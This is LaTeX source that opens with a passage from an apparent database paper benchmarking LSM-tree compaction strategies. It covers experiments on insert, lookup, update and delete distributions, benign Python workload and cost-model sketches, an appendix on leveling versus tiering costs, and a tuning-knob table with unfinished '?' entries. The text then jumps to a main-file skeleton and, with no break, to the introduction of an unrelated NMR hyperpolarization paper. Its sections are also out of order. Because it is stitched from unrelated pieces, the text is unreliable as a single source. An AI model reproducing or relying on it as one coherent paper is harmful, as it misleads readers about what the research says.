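    """PrefixZipf: Zipfian prefixes (s=1.0) with uniform random suffixes,
    so keys are skewed by range yet mostly unique (few accidental updates)."""
    rng = random.Random(seed)
    weights = [1.0 / (rank ** s) for rank in range(1, n_prefixes + 1)]
    prefixes = rng.choices(range(n_prefixes), weights=weights, k=n)
    return [f"{p:03d}-{rng.randrange(10**9):09d}" for p in prefixes]

keys = prefix_zipf_keys(10_000)
print(len(set(keys)) / len(keys))   # close to 1.0: almost all inserts unique
```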
\Paragraph{Ingestion Performance is Agnostic to Insert Distribution}
Figures \ref{fig:W1}(a), \ref{fig:W5}(a), and \ref{fig:W5}(e) show that the total data movement during compactions remains virtually identical for (unique) insert-only workloads generated using uniform, PrefixZipf, and normal distributions, respectively.
Further, we observe that the mean and tail compaction latencies are agnostic of the ingestion distribution
(Fig. \ref{fig:W1}(c), \ref{fig:W5}(b), and \ref{fig:W5}(f) are almost identical as well).
As long as the data distribution does not change over
time, the entries in each level follow the
same distribution and the overlap between
different levels remains the same.
\textit{Therefore, for an ingestion-only workload
the data distribution does not influence the
choice of compaction strategy.}
\Paragraph{\Ob Insert Distribution Influences Point Queries}
Figure \ref{fig:W5}(c) shows that while tiering has a
slightly higher latency for point lookups, the relative
performance of the compaction strategies is close to each
other for any fraction of non-empty queries in the
workload (all values of $\alpha$).
This is because when empty queries are drawn uniformly from the key domain, the level-wise metadata and index blocks help avoid the vast majority of unnecessary disk accesses (including fetching index or filter blocks).
In Fig.~\ref{fig:W5}(d), we observe that the read
amplification remains comparable to that in
Fig. \ref{fig:W1}(f) (\textit{uniform} ingestion) for $\alpha = 0$ and even $\alpha = 0.4$.
However, for $\alpha = 0.8$, the read amplification in
Fig. \ref{fig:W5}(d) becomes $65\%$--$75\%$ smaller than
in the case of uniform inserts, and the number of I/Os performed to
fetch the filter blocks drops close to zero.
\textit{This shows that all compaction strategies perform equally well while executing an empty query-heavy workload on a database pre-populated with PrefixZipf inserts.}
In contrast, when performing lookups on a database pre-loaded with normal ingestion, the point lookup performance (Fig. \ref{fig:W5}(g)) largely resembles its uniform equivalent (Fig. \ref{fig:W1}(h)), as the ingestion-skewness is comparable.
The filter and index block hits are $\sim10\%$ higher for the normal distribution compared to uniform for larger values of $\alpha$, which explains the comparatively lower read amplification shown in Fig. \ref{fig:W5}(h).
This plot also shows the first case of unpredictable behavior of \texttt{LO+2} for $\alpha=0$ and $\alpha=0.2$.
We observe more instances of such unpredictable behavior for \texttt{LO+2}, which probably explains why it is rarely used in new LSM stores.
Once again, for both the compaction and tail lookup performance, \texttt{1-Lvl} offers highly predictable performance.
\subsubsection{\textbf{Varying the Point Lookup Distribution}}
In this experiment, we change the point lookup
distribution to \textbf{Zipfian} and \textbf{normal},
while keeping the ingestion distribution as uniform.
\Paragraph{The Distribution of Point Lookups Significantly Affects Performance}
Zipfian point lookups on uniformly populated data
leads to low latency point queries for all compaction
strategies, as shown in Fig. \ref{fig:W6}(a) because the
block cache is enough for the popular blocks in all cases,
as also shown by the low read amplification in
Fig. \ref{fig:W6}(b).
On the other hand, when queries follow the normal
distribution, partial compaction strategies \texttt{LO+1}
and \texttt{LO+2} dominate all other approaches, while
\texttt{Tier} is found to perform significantly
slower than all other approaches, as shown in
Fig. \ref{fig:W6}(c) and \ref{fig:W6}(d).
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{For skewed ingestion/lookups, all compaction strategies behave similarly in terms of lookup performance}} \textit{While the ingestion distribution does not influence ingestion performance, heavily skewed ingestion or lookups impact query performance through the block cache and file metadata.}
}%
\normalsize
}
\vspace{1mm}
\begin{figure*}[h]
\vspace{-0.3in}
\centering
\includegraphics[width=\textwidth]{omnigraffle/Plot-7.pdf}
\vspace*{-0.2in}
\caption{Experiments with varying workload and data characteristics (a-l) and LSM tuning (m-r) show that there is no perfect compaction strategy -- choosing the appropriate compaction strategy is subject to the workload and the performance goal.}
\label{fig:W7}
\vspace*{-0.1in}
\end{figure*}
\subsubsection{\textbf{Varying the Proportion of Updates}}
We now vary the update-to-insert ratio, while interleaving
queries with ingestion. An update-to-insert ratio $0$ means
that all inserts are unique, while a ratio $8$ means that
each unique insert receives $8$ updates on average.
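The ingestion stream for a given update-to-insert ratio $r$ can be sketched as below, where a fraction $r/(1+r)$ of operations update an existing key (the key encoding and seed are illustrative):

```python
import random

def ingest_stream(n_ops, update_ratio, seed=1):
    """Insert/update mix: each unique key receives `update_ratio`
    updates on average, i.e. a fraction r/(1+r) of operations are updates."""
    rng = random.Random(seed)
    p_update = update_ratio / (1 + update_ratio)
    keys, ops = [], []
    for _ in range(n_ops):
        if keys and rng.random() < p_update:
            ops.append(("update", rng.choice(keys)))
        else:
            k = len(keys)                  # fresh unique key
            keys.append(k)
            ops.append(("insert", k))
    return ops

ops = ingest_stream(100_000, update_ratio=8)
updates = sum(op == "update" for op, _ in ops)
print(updates / (len(ops) - updates))      # close to 8 updates per unique insert
```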
\Paragraph{\Ob For Higher Update Ratio Compaction Latency for Tiering Drops; \texttt{LO+2} Dominates the Leveling Strategies}
As the fraction of updates increases, the mean compaction latency decreases
significantly for tiering because we discard multiple
updated entries in every compaction (Fig. \ref{fig:W7}(a)).
We observe similar
but less pronounced trends for \texttt{Full} and
\texttt{LO+2}, while the remaining leveling strategies
remain largely unchanged.
\textit{Overall, larger
compaction granularity helps to exploit the presence of
updates by invalidating more entries at a time.}
Among the leveling strategies, \texttt{LO+2} performs best as
it moves $\sim$$20\%$ less
data during compactions, which also affects write
amplification as shown in Fig. \ref{fig:W7}(b).
As the fraction of updates increases, all compaction strategies including
\texttt{Tier} have lower tail compaction latency.
Fig. \ref{fig:W7}(c) shows that \texttt{Tier}'s tail compaction latency
drops from $6\times$ higher than \texttt{Full} to $1.2\times$ for an
update-to-insert ratio of $8$, which demonstrates that \texttt{Tier} is
most suitable for update-heavy workloads. We also observe that lookup
latency and read amplification also decrease for update-heavy workloads.
\Paragraph{The Point Lookup Latency Stabilizes with the Level Count}
Fig. \ref{fig:W7}(d) shows that as the update-to-insert ratio increases, the mean point lookup latency decreases sharply before stabilizing.
The initial sharp fall in the latency is attributed to a decrement in the number of levels (from $4$ to $3$) in the LSM-tree, when the update-to-insert ratio increases from $0.4$ to $1$.
The latency then stabilizes because non-empty point lookups perform at least one disk I/O, which, in turn, dominates the overall lookup cost.
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{Tiering dominates the performance for update-intensive workloads}} \textit{When subject to update-intensive workloads, \texttt{Tier} exhibits superior compaction performance along with comparable lookup performance (as leveled LSMs), which allows it to dominate the overall performance space.}
}%
\normalsize
}
\vspace{1mm}
\subsubsection{\textbf{Varying Delete Proportion}}
We now analyze the impact of deletes, which manifest as out-of-place
invalidations with special entries called tombstones \cite{Sarkar2020}.
We keep the same data size and vary the proportion of point
deletes in the workload. All deletes are issued on existing keys and are
interleaved with the inserts.
\Paragraph{\texttt{TSD} and \texttt{TSA} Offer Superior Delete Performance}
We quantify the efficacy of deletion using the number of tombstones at the end
of the workload execution.
The lower this number, the faster deleted data has
been purged from the database, which in turn reduces space, write, and read
amplification.
Fig. \ref{fig:W7}(e) shows that \texttt{TSD} and \texttt{TSA} maintain the fewest tombstones at the end of the experiment.
For a workload with $10\%$ deletes, \texttt{TSD} purges $16\%$ more tombstones than \texttt{Tier} and $5\%$ more tombstones than \texttt{LO+1} by picking the files that have a tombstone density above a pre-set threshold for compaction.
For \texttt{TSA}, we experiment with two different delete persistence thresholds: \texttt{TSA}$_{33}$ and \texttt{TSA}$_{50}$, set to $33\%$ and $50\%$ of the experiment run-time, respectively.
As \texttt{TSA} guarantees persistent deletes within the thresholds set, it compacts more data aggressively, and ends up with $7$--$10\%$ fewer tombstones as compared to \texttt{TSD}.
\texttt{Full} manages to purge more tombstones than any partial compaction routine, as it periodically compacts entire levels.
\texttt{Tier} retains the highest number of tombstones as it maintains the highest number of sorted runs overall.
As the proportion of deletes in the workload increases, the number of tombstones remaining in the LSM-tree (after the experiment is over) increases.
\texttt{TSA} and \texttt{TSD} along with \texttt{Full} scale better than the partial compaction routines and tiering.
By compacting more tombstones, \texttt{TSA} and \texttt{TSD} also purge more invalid data reducing space amplification, as shown in Fig. \ref{fig:W7}(f).
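The \texttt{TSD} trigger can be sketched as a simple file picker; this is our paraphrase of the policy (pick the file whose tombstone density exceeds a preset threshold), not the engine's code:

```python
# Hedged sketch of a TSD-style trigger: among the files in a level, compact
# the one whose tombstone density exceeds a preset threshold.
def pick_file_tsd(files, threshold=0.2):
    """files: list of (file_id, n_entries, n_tombstones)."""
    candidates = [(ts / n, fid) for fid, n, ts in files if ts / n > threshold]
    return max(candidates)[1] if candidates else None   # densest file first

files = [("f1", 1000, 50), ("f2", 1000, 400), ("f3", 1000, 250)]
print(pick_file_tsd(files))   # 'f2': highest tombstone density above threshold
```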
\Paragraph{\Ob Optimizing for Deletes Comes at a (Write) Cost}
The reduced space amplification offered by \texttt{TSA} and \texttt{TSD} is achieved by compacting the tombstones eagerly, which increases the overall amount of data moved due to compaction.
Fig. \ref{fig:W7}(g) shows that \texttt{TSD} and \texttt{TSA}$_{50}$ compact
$18\%$ more data than the write-optimized \texttt{LO+1} (for \texttt{TSA}$_{33}$ this becomes $35\%$).
Thus, \texttt{TSD} and \texttt{TSA} are useful when the objective is to (i) persist deletes timely or (ii) reduce space amplification caused by deletes.
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{\texttt{TSD} and \texttt{TSA} are tailored for deletes}} \textit{\texttt{TSA} and \texttt{TSD}, by design, choose files with tombstones for compactions to reduce space amplification. \texttt{TSA} ensures timely persistent deletion by compacting more data eagerly for smaller persistence thresholds, which increases the write amplification.}
}%
\normalsize
}
\vspace{1mm}
\subsubsection{\textbf{Varying the Ingestion Count}}
We now report the scalability results by varying the data size from $2^{27}$B to $2^{35}$B.
\Paragraph{\Ob \texttt{Tier} Scales Poorly Compared to Leveled and Hybrid Strategies}
The mean compaction latency scales sub-linearly for all compaction strategies barring \texttt{Tier}, as shown in Fig. \ref{fig:W7}(h).
\textit{The relative advantages of compaction strategies with leveled and hybrid data layouts remain similar regardless of the data size.}
This observation is further backed up by Fig. \ref{fig:W7}(i) which shows how write amplification scales.
We also observe that the advantages of the RocksDB implementation of tiering (i.e., \textit{universal compaction})~\cite{RocksDB2020} diminish as the data size grows beyond $8$GB.
Fig.~\ref{fig:W7}(j) shows that as the data size increases, the tail compaction latency for \texttt{Tier} increases, as the worst-case overlap between files from consecutive levels increase significantly.
This makes \texttt{Tier} unsuitable for latency-sensitive applications.
When the data size reaches $2$GB, \texttt{Full} triggers a \textit{cascading compaction} that writes all data to a new level, causing spikes in write amplification and compaction latency.
\subsubsection{\textbf{Varying Entry Size}}
Here, we keep the key size constant ($4$B) and vary the value from $4$B to
$1020$B to vary the entry size.
\Paragraph{\Ob For Smaller Entry Size, Leveling Compactions are More Expensive}
Smaller entry size increases the number of
entries per page, which in turn, leads to (i) more keys to be compared during
merge and (ii) bigger Bloom filters that require more space per file and more CPU for hashing.
Fig. \ref{fig:W7}(k) shows these trends. We also observe similar
trends for write amplification in Fig. \ref{fig:W7}(l) and for query latency.
They both decrease as the entry size increases.
However, as the overall data size increases with the entry size, we observe the compaction latency and write amplification to increase steeply for \texttt{Tier} (similarly to Fig. \ref{fig:W7}(h) and (i)).
\subsection{LSM Tuning Influence}
\label{subsec:tuning}
In the final part of our analysis, we discuss the interplay of
compactions with the standard LSM tunings knobs, such as memory buffer size, page size, and size ratio.
\Paragraph{\Ob Compactions with Tiering Scale Better with Buffer Size}
Fig. \ref{fig:W7}(m) shows that as the buffer size increases, the mean compaction latency increases across all compaction strategies.
The size of the buffer dictates the size of the files on disk, and
a larger file size leads to more data being moved per compaction.
Also, for larger file size, the filter size per file increases along with the time spent for hashing, which increases compaction latency.
Further, as the buffer size increases, the mean compaction latency for \texttt{Tier} scales better than the other strategies.
Fig. \ref{fig:W7}(n) shows that the high tail compaction latency for \texttt{Tier} plateaus quickly as the buffer size increases, and eventually crosses over that of the more eager compaction strategies when the buffer size reaches $64$MB.
We also observe in Fig. \ref{fig:W7}(o) that among the partial compaction routines \texttt{Old} experiences an increased write amplification throughout, while \texttt{LO+1} and \texttt{LO+2} consistently offer lower write amplification and guarantee predictable ingestion performance.
Fig. \ref{fig:W7}(p) shows that as the memory buffer size increases, the mean point lookup latency increases superlinearly.
This is because, for larger memory buffers, the files on disk hold a greater number of pages, and thereby, more entries.
Thus, the combined size of the index block (one index per page) and filter block (typically, $10$ bits per entry) per file grows proportionally with the memory buffer size.
The time elapsed in fetching the index and filter blocks causes the mean latency for point lookups to increase significantly.
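The growth of per-file metadata with the buffer size can be checked with simple arithmetic ($10$ bits-per-key filters as configured; the $1$KB entry size and $4$KB page size below are illustrative assumptions):

```python
# How per-file metadata grows with the buffer (= file) size.
def per_file_metadata(buffer_bytes, entry_bytes=1024, page_bytes=4096,
                      bits_per_key=10):
    entries = buffer_bytes // entry_bytes
    filter_bytes = entries * bits_per_key // 8
    index_entries = buffer_bytes // page_bytes   # one index entry per page
    return filter_bytes, index_entries

for mb in (8, 16, 32, 64):
    print(mb, per_file_metadata(mb * 2**20))
```

Both the filter and index footprints grow linearly with the file size, so fetching them costs proportionally more as the buffer grows.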
\Paragraph{All Compaction Strategies React Similarly to Varying the Page Size}
In this experiment, we vary the logical page size, which in turn, changes the number of entries per page.
The smaller the page size, the larger the number of pages per file, meaning more I/Os are required to access a file on disk.
For example, when the page size shrinks from $2^{10}$B to $2^9$B, the number of pages per file doubles.
With a smaller page size, the index block size per file increases as more pages must be indexed, which also contributes to the increasing I/Os.
Thus, an increase in the logical page size, reduces the mean compaction latency, as shown in Fig.~\ref{fig:W7}(q).
In Fig.~\ref{fig:W7}(r), we observe that as the page size increases, the size of the index block per file decreases, and on average fewer I/Os are performed to fetch the metadata block overall for every point lookup.
\Paragraph{Miscellaneous Observations}
We also vary LSM tuning parameters such as the size ratio, the memory allocated
to Bloom filters, and the size of the block cache.
We observe that changing the values of these knobs
affects the different compaction strategies similarly, and
hence, does not influence the choice of the appropriate
compaction strategy for any particular set up.
\section*{Acknowledgment}
We thank the reviewers for their valuable feedback.
We are particularly thankful to Guanting Chen for his contributions in the early stages of this project.
This work was partially funded by National Science Foundation under Grant No. IIS-1850202 and a Facebook Faculty Research Award.
\subsection*{4.1* Compaction Eagerness}
Below, we discuss how the performance of an LSM-based storage engine is affected by the compaction eagerness.
\Paragraph{Leveling} A leveled LSM-tree eagerly merges the overlapping sorted runs every time a level is saturated, and affects the performance of the storage engine as follows.
\textit{Write amplification}: In a leveled LSM-tree, every time a Level $i$ reaches its capacity, all (or a subset of) the files from Level $i$ are compacted with all (or the overlapping) files from Level $i+1$; thus, on average, each entry is written $T$ times within a level, which leads to an average-case write amplification of $\mathcal{O}(T \cdot L)$.
\textit{Write throughput}: A leveled LSM-tree performs compactions eagerly whenever the memory buffer is full or a disk level reaches a nominal capacity.
This triggers compactions frequently, which consumes the device bandwidth at a greater degree, and affects the write throughput adversely.
\textit{Point lookups}: For leveling, the average cost for a point lookup on a non-existing key is given as $\mathcal{O}(L \cdot e^{-BPK})$, and that on an existing key is $\mathcal{O}(1 + L \cdot e^{-BPK})$, as it must always perform at least one I/O to fetch the target key.
\textit{Range lookups}: Compaction eagerness controls the number of sorted runs in an LSM-tree, and therefore, influences the cost for range lookups.
The average cost for a long range lookup is given as $\mathcal{O}(\tfrac{s \cdot N}{B})$ for leveling, with $s$ being the average selectivity of the range queries.
For short range queries, the average cost is simply proportional to the number of sorted runs, and is given as $\mathcal{O}(L)$.
\textit{Space amplification}: In presence of only updates and no deletes in a workload, the worst-case space amplification in a leveled LSM-tree is $\mathcal{O}(1/T)$~\cite{Dayan2018}.
However, with the addition of deletes, the space amplification increases significantly, and is given as $\mathcal{O}(\tfrac{N}{1 - \lambda})$ for leveling, where $\lambda$ is the ratio of the size of a tombstone to the average size of a key-value pair~\cite{Sarkar2020}.
\textit{Delete performance}: The average time taken to persistently delete an entry from a tree is given by $\mathcal{O}(\tfrac{T^{L-1} \cdot P \cdot B}{I})$ for leveling~\cite{Sarkar2020}, where $I$ denotes the rate of ingestion of unique entries to the database.
Note that, for leveling, the tombstone must be propelled to the last level to guarantee persistent deletion of the target entry.
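The leveling costs above can be put together in a short back-of-the-envelope sketch. All parameter values below are illustrative assumptions (with the memory buffer assumed to hold $B \cdot P$ entries), and $e^{-BPK}$ is taken literally as the Bloom-filter shorthand used in the text:

```python
import math

# Back-of-the-envelope leveling cost model; all parameter values are
# illustrative assumptions (buffer assumed to hold B*P entries).
N = 2**30      # total number of entries
B = 128        # entries per disk page
P = 1024       # pages in the memory buffer
T = 10         # size ratio between adjacent levels
BPK = 10       # Bloom-filter bits per key

L = math.ceil(math.log(N / (B * P), T))      # number of levels
write_amp = T * L                            # each entry rewritten ~T times per level
zero_result = L * math.exp(-BPK)             # expected I/Os, non-existing key
existing = 1 + L * math.exp(-BPK)            # >= 1 I/O to fetch the target key
print(f"L={L}, write-amp={write_amp}, zero-result lookup={zero_result:.5f} I/Os")
```

With these assumed values the tree has four levels, and the Bloom filters keep the expected zero-result lookup cost far below one I/O per query.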
\Paragraph{Tiering} A tiered LSM merges the sorted runs lazily and is optimized for writes.
\textit{Write amplification}: For a tiered LSM, each level may have up to $T$ sorted runs with overlapping key-ranges; thus, each entry is written at least once per level resulting in an average-case write amplification of $\mathcal{O}(L)$.
\textit{Write throughput}: For tiering, compactions are less frequent and with the device bandwidth mostly free of compaction traffic, the write throughput is significantly improved.
\textit{Point lookups}: The average point lookup cost for a tiered LSM is $\mathcal{O}(T \cdot L \cdot e^{-BPK})$ for lookups on a non-existing key, and $\mathcal{O}(1 + T \cdot L \cdot e^{-BPK})$ for existing keys.
\textit{Range lookups}: For tiering, the average cost for a long range lookup is given as $\mathcal{O}(\tfrac{T \cdot s \cdot N}{B})$, and that for short range lookups is $\mathcal{O}(T \cdot L)$.
\textit{Space amplification}: The worst-case space amplification in a tiered LSM-tree is $\mathcal{O}(T)$~\cite{Dayan2018} for workloads with updates but no deletes; this increases to $\mathcal{O}(\tfrac{(1 - \lambda) \cdot N + 1}{\lambda \cdot T})$ in the presence of deletes.
\textit{Delete performance}: The average latency for delete persistence for a tiered LSM is given by $\mathcal{O}(\tfrac{T^L \cdot P \cdot B}{I})$, as, in the case of tiering, the tombstone must participate in a compaction involving all the sorted runs from the last level to guarantee delete persistence.
\Paragraph{Hybrid Designs} Hybrid LSM-designs are generalized by $l$-leveling, which includes lazy leveling, RocksDB-style hybrid leveling with only the first level being tiered, and other LSM-variants proposed in \cite{Dayan2019} and \cite{Idreos2019}.
\textit{Write amplification}: An $l$-leveled LSM-tree has its last $l$ levels implemented as leveled and the remaining shallower $L-l$ levels as tiered; thus, the average-case write amplification of an $l$-leveled tree is given as $\mathcal{O}(L-l) + \mathcal{O}(T \cdot l)$.
For lazy leveling, $l = 1$, which makes the write amplification of the LSM-tree asymptotically similar to that of a tiered LSM; for RocksDB-style hybrid leveling, $l = L-1$, which closely resembles the write amplification of a leveled LSM.
\textit{Write throughput}: The write throughput of hybrid LSM-designs falls in between that of leveling and tiering, and depends on the number of levels implemented as tiered versus leveled.
\textit{Point lookups}: For a hybrid design with $L-l$ tiered and $l$ leveled levels, the average lookup cost on non-existing keys becomes $\mathcal{O}((T \cdot (L-l) + l) \cdot e^{-BPK})$, and that on existing keys becomes $\mathcal{O}(1 + (T \cdot (L-l) + l) \cdot e^{-BPK})$.
\textit{Range lookups}: For hybrid designs, the costs for range lookups fall in between those for leveling and tiering, and depend on the exact design of the tree.
\textit{Space amplification}: The space amplification for hybrid designs lies between the two extremes, and depends heavily on the exact tree design.
\textit{Delete performance}: For hybrid designs, the latency to persist deletes depends only on the implementation of the last level of the tree, i.e., if the last level is implemented as tiered, the latency is the same as for a tiered LSM; otherwise, it is similar to that of a leveled LSM-tree.
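The interpolation between the two extremes can be made concrete with a small sketch of the $l$-leveling cost model. This is a hypothetical illustration, not a measured model; leveling and tiering are recovered as the special cases $l = L$ and $l = 0$:

```python
import math

# l-leveling: the last l levels are leveled, the shallower L-l levels tiered.
# Illustrative sketch of the asymptotic costs discussed in the text.
def write_amp(L, T, l):
    return (L - l) + T * l                   # O(L-l) + O(T*l)

def runs(L, T, l):
    # up to T overlapping sorted runs per tiered level, one per leveled level
    return T * (L - l) + l

def zero_result_lookup(L, T, l, bpk):
    return runs(L, T, l) * math.exp(-bpk)    # expected I/Os, non-existing key

L, T = 5, 10
for name, l in (("leveling", L), ("lazy leveling", 1), ("tiering", 0)):
    print(f"{name:13s} write-amp={write_amp(L, T, l):3d} runs={runs(L, T, l):3d}")
```

Setting $l = L$ reproduces the leveled costs ($T \cdot L$ write amplification, $L$ runs), $l = 0$ the tiered ones ($L$ and $T \cdot L$ respectively), and intermediate $l$ trades one against the other.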
\begin{table*}[t]
\centering
\resizebox{\textwidth}{!}{%
\begin{tabular}{l|l}
\toprule
\multirow{1}{*}{\textbf{Knobs}} & \textbf{Remark} \\
\midrule
\multirow{1}{*}{Size ratio} & \shortstack[l]{
\textit{Space-amplification}: Larger size ratio → fewer levels → reduced space-amp \\
\textit{Write-amplification}: Larger size ratio → each entry is merged more times on average → increased write amplification. \\
\textit{Update cost}: Larger size ratio → an updated entry is merged more times on average before it is consolidated → higher average worst-case update cost \\
\textit{Read cost}: Larger size ratio → fewer levels → lower expected lookup cost $\mathcal{O}(L)$. \\
\textit{Individual compaction bytes}: Larger size ratio → more entries to be copied during a compaction → more total compaction bytes. \\
\textit{*Update throughput}: ? \\
\textit{Modeling graph: https://www.desmos.com/calculator/q4ko9j1wmp}
} \\
\midrule
\multirow{1}{*}{Memory buffer} & \shortstack[l]{
\textit{Space-amplification}: Larger memory buffer → fewer levels → reduce space-amp in general and can be slightly optimized for skewed workloads. \\
\textit{Write-amplification}: Larger memory buffer → on average, every entry still participates in the same total number of compactions → no change. \\
\textit{Update cost}: Larger memory buffer → fewer levels → an updated entry participates in fewer compactions in total before it is consolidated → lower average worst-case update cost \\
\textit{Read cost}: Larger memory buffer → fewer levels → lower expected lookup cost $\mathcal{O}(L)$. \\
\textit{Individual compaction bytes}: Larger memory buffer → Larger file size → more entries to be copied during a compaction → more individual compaction bytes. \\
\textit{*Read throughput}: ? \\
\textit{*Update throughput}: ? \\
\textit{Modeling graph: https://www.desmos.com/calculator/udmwdg5dt1}
} \\
\midrule
\multirow{1}{*}{File size} & \shortstack[l]{
\textit{Space-amplification}: No changes. \\
\textit{Write-amplification}: No changes. \\
\textit{Update cost}: No changes. \\
\textit{Read cost}: No changes. \\
\textit{Individual compaction bytes}: Larger file size → more entries to be copied during a compaction → more individual compaction bytes \\
\textit{*Read throughput}: ? \\
\textit{*Update throughput}: ? \\
\textit{Others}:
} \\
\midrule
\multirow{1}{*}{Bloom filters} & \shortstack[l]{
\textit{Space-amplification}: Larger bytes per key → increase space-amplification. \\
\textit{Write-amplification}: No changes. \\
\textit{Update cost}: No changes. \\
\textit{Read cost}: Larger bytes per key → more memory allocated to the Bloom filters → lower read cost $\mathcal{O}(L)$ \\
\textit{Individual compaction bytes}: Larger bytes per key → more bytes written in individual compactions. \\
\textit{*Read throughput}: ? \\
\textit{*Update throughput}: ? \\
\textit{Others}:
} \\
\midrule
\multirow{1}{*}{Block cache} & \shortstack[l]{
\textit{Space-amplification}: No changes. \\
\textit{Write-amplification}: No changes. \\
\textit{Update cost}: No changes. \\
\textit{Read cost}: Cache indexes, filters, data blocks for reads → significantly better read performance. \\
\textit{Read throughput}: Directly read from memory → significantly larger read throughput. \\
\textit{Individual compaction bytes}: No changes.\\
\textit{*Update throughput}: ? \\
\textit{Others}: Reads are more optimized for skewed workloads.
} \\
\midrule
\multirow{1}{*}{Threads} & \shortstack[l]{
\textit{Space-amplification}: No changes. \\
\textit{Write-amplification}: No changes. \\
\textit{Update cost}: No changes. \\
\textit{Read cost}: Shorten compaction duration → timely reclamation, which can reduce read amplification when a batch of reads arrives right after multi-level compactions triggered by intensive updates. \\
\textit{Individual compaction bytes}: No changes. \\
\textit{Read throughput}: Shorten compaction duration → increase read throughput for interleaved workloads.\\
\textit{Update throughput}: Shorten compaction duration → increase overall write throughput. \\
\textit{*Others}: Shorten compaction duration → consolidate duplicate and discarded entries in a timely manner → reduced read amplification and lookup cost → and better space amplification?
} \\
\midrule
\multirow{1}{*}{File size multiplier} & \shortstack[l]{
\textit{Space-amplification}: No changes. \\
\textit{Write-amplification}: Larger file size multiplier → a larger level contributes more entries copied per compaction at the same compaction frequency → increased write-amplification. \\
\textit{Update cost}: Larger file size multiplier → a larger level contributes more entries copied per compaction at the same compaction frequency → higher update cost. \\
\textit{Read cost}: No changes. \\
\textit{Individual compaction bytes}: Larger file size multiplier → larger level has larger compaction bytes but with the same compaction frequency. \\
\textit{Read throughput}: No changes. \\
\textit{Update throughput}: Shorten compaction duration → increase overall write throughput. \\
\textit{Others}:
} \\
\midrule
\multirow{1}{*}{Level$_0$ compaction trigger} & \shortstack[l]{
\textit{Space-amplification}: More Level$_0$ files → increase space-amplification. \\
\textit{Write-amplification}: Level$_0$ self compactions → increase write-amplification. \\
\textit{Update cost}: More Level$_0$ files → more compactions needed to consolidate an existing entry. \\
\textit{Read cost}: More Level$_0$ files → increase space-amplification and read amplification → higher read cost. \\
\textit{Individual compaction bytes}: More compaction bytes between Level$_0$ and Level$_1$ compactions.\\
\textit{Update throughput}: More Level$_0$ files → increase insert/update throughput. \\
\textit{*Read throughput}: ? \\
\textit{Others}:
} \\
\midrule
\multirow{1}{*}{Max compaction bytes} & \shortstack[l]{
\textit{Space-amplification}: If too small, redundant entries might not be compacted in a timely manner → increase space-amplification. \\
\textit{*Write-amplification}: ? \\
\textit{*Update cost}: ? \\
\textit{Read cost}: If too small, redundant entries might not be reclaimed in time → increase read cost. \\
\textit{*Read throughput}: ? \\
\textit{Individual compaction bytes}: No changes.\\
\textit{Update throughput}: If too small, further compactions need to be performed → reduced update throughput. \\
\textit{Others}:
} \\
\midrule
\multirow{1}{*}{Compaction readahead size} & \shortstack[l]{
\textit{Space-amplification}: No changes. \\
\textit{Write-amplification}: No changes. \\
\textit{Update cost}: No changes. \\
\textit{Read cost}: Perform bigger reads when doing compactions → increase read amplification and read cost. \\
\textit{*Read throughput}: ? \\
\textit{Individual compaction bytes}: No changes.\\
\textit{Update throughput}: No changes. \\
\textit{Others}:
} \\
\bottomrule
\end{tabular}
}
\caption{LSM-Tree compaction tuning knobs. \label{tab:cost}}
\vspace{-0.2in}
\end{table*}
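The size-ratio row of the table can be sketched numerically: a larger $T$ flattens the tree (fewer levels, hence cheaper lookups and less space amplification) at the price of higher write amplification. All parameter values are illustrative assumptions, with the memory buffer assumed to hold $B \cdot P$ entries:

```python
import math

# Sweep the size ratio T (first row of the table); all values are
# illustrative assumptions, with the buffer holding B*P entries.
N, B, P = 2**30, 128, 1024
eps = 1e-9                    # guard against float rounding at exact powers of T
for T in (2, 4, 8, 16):
    L = math.ceil(math.log(N / (B * P)) / math.log(T) - eps)
    print(f"T={T:2d}  levels={L:2d}  write-amp~{T * L}")
```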
\section{Introduction}
\label{sec:introduction}
\input{1-introduction}
\section{Background}
\label{sec:background}
\input{2-background}
\section{The Compaction Design Space}
\label{sec:compaction}
\input{3-compaction}
\section{Benchmarking Compactions}
\label{sec:methodology}
\input{4-methodology}
\section{Experimental Evaluation}
\label{sec:results}
\input{5-results}
\input{5-results_temp}
\section{Discussion}
\label{sec:tuning}
\input{6-tuning}
\section{Conclusions}
\label{sec:conclusion}
\input{8-conclusion}
\balance
{
\input{biblio}
}
\ifx\mode\undefined
\section*{}
\vspace{-1cm}
\footnotetext{\textit{School of Chemistry, Highfield Campus, Southampton, United Kingdom, SO171BJ. E-mail: l.dagys@soton.ac.uk}}
\section{Introduction}
\label{sec:introduction}
The inherently low sensitivity of Nuclear Magnetic Resonance (NMR) may be largely overcome through the use of hyperpolarization methods~\cite{natterer_parahydrogen_1997, bowers_parahydrogen_1987,ardenkjaer-larsen_increase_2003,maly_dynamic_2008,walker_spin-exchange_1997,kovtunov_hyperpolarized_2018, emondts_polarization_2017,stephan_13c_2002,adams_reversible_2009,johannesson_transfer_2004,theis_light-sabre_2014,theis_microtesla_2015,cavallari_effects_2015,eills_polarization_2019,bengs_robust_2020,devience_homonuclear_nodate,rodin_constant-adiabaticity_2021-1,rodin_constant-adiabaticity_2021,knecht_rapid_2021,dagys_low-frequency_2021,dagys_nuclear_2021}. At the core of these methods is the production of nuclear spin order far from thermal equilibrium, which can lead to signal enhancements of many orders of magnitude.
Particularly promising techniques are \emph{para}\xspace-hydrogen induced polarisation (PHIP) methods~\cite{natterer_parahydrogen_1997,bowers_parahydrogen_1987,emondts_polarization_2017,stephan_13c_2002,adams_reversible_2009,johannesson_transfer_2004,theis_light-sabre_2014,theis_microtesla_2015,cavallari_effects_2015,eills_polarization_2019,bengs_robust_2020,devience_homonuclear_nodate,rodin_constant-adiabaticity_2021-1,rodin_constant-adiabaticity_2021,knecht_rapid_2021,dagys_low-frequency_2021,dagys_nuclear_2021}. Methods of this type utilise molecular hydrogen gas enriched in its \emph{para}\xspace-spin isomer, typically achieved by passing the cooled gas over an iron oxide catalyst~\cite{bowers_parahydrogen_1987,natterer_parahydrogen_1997}.
